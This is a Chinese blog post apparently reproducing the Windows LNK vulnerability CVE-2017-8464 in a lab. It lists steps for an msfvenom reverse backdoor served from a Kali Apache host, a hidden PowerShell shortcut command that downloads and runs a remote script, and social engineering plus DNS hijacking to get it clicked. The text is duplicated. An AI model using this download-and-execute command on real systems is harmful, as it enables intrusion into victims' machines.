CVE-2017-8464 LNK文件(快捷方式)远程代码执行漏洞复现
2017-07-25 19:01
1116 查看
北京时间2017年6月13日凌晨,微软官方发布6月安全补丁程序,“震网三代” LNK文件远程代码执行漏洞(CVE-2017-8464)和Windows搜索远程命令执行漏洞(CVE-2017-8543).
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机 Kali
IP: 192.168.1.113
靶机:win10
IP: 192.168.1.3
1.使用msfvenom生成一个msf反弹后门
2.将/opt 下的search.psl 复制到 /var/www/html 下
3.启动apache服务service apache2 start
4.在靶机上创建一个powershell远程快捷:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"
5.在kali下监听
6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了
成功
思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。
CVE-2017-8543,当Windows搜索处理内存中的对象时,存在远程执行代码漏洞。成功利用此漏洞的攻击者可以控制受影响的系统。
CVE-2017-8464,当Windows系统在解析快捷方式时,存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
攻击机 Kali
IP: 192.168.1.113
靶机:win10
IP: 192.168.1.3
1.使用msfvenom生成一个msf反弹后门
2.将/opt 下的search.psl 复制到 /var/www/html 下
3.启动apache服务service apache2 start
4.在靶机上创建一个powershell远程快捷:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.113/search.ps1');test.ps1"
5.在kali下监听
6.利用社会工程学误导靶机点击powershell快捷方式,kali就可以监听到了
成功
思考:当Apache启动之后,靶机可以通过访问192.168.1.113来触发spl,那么可以利用DNS劫持使靶机,引导靶机访问。
相关文章推荐
- iis6.0远程代码执行漏洞复现(CVE-2017-7269)
- 【渗透测试】ApacheTomcat 远程代码执行漏洞复现CVE-2017-12615
- CVE-2017-8464 远程命令执行漏洞复现
- 【漏洞公告】CVE-2017-8464 :Microsoft Windows LNK 远程代码执行漏洞
- CVE-2017-8464远程命令执行漏洞复现
- 技术文章 | CVE-2017-12615/CVE-2017-12616:Tomcat信息泄漏和远程代码执行漏洞分析报告
- Office CVE-2017-8570远程代码执行漏洞复现
- IIS 6.0远程代码执行漏洞(CVE-2017-7269)
- Office CVE-2017-8570 远程代码执行漏洞复现
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- 漏洞到来:CVE-2017-8620:Windows Search远程代码执行漏洞
- CVE-2017-8464远程命令执行漏洞(震网漏洞)复现
- Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
- CVE-2012-0003 Microsoft Windows Media Player ‘winmm.dll’ MIDI文件解析远程代码执行漏洞 分析
- Office CVE-2017-8570远程代码执行漏洞复现
- Microsoft远程桌面协议RDP远程代码可执行漏洞(CVE-2012-0002)(MS12-020)
- Tomcat/7.0.81 远程代码执行漏洞复现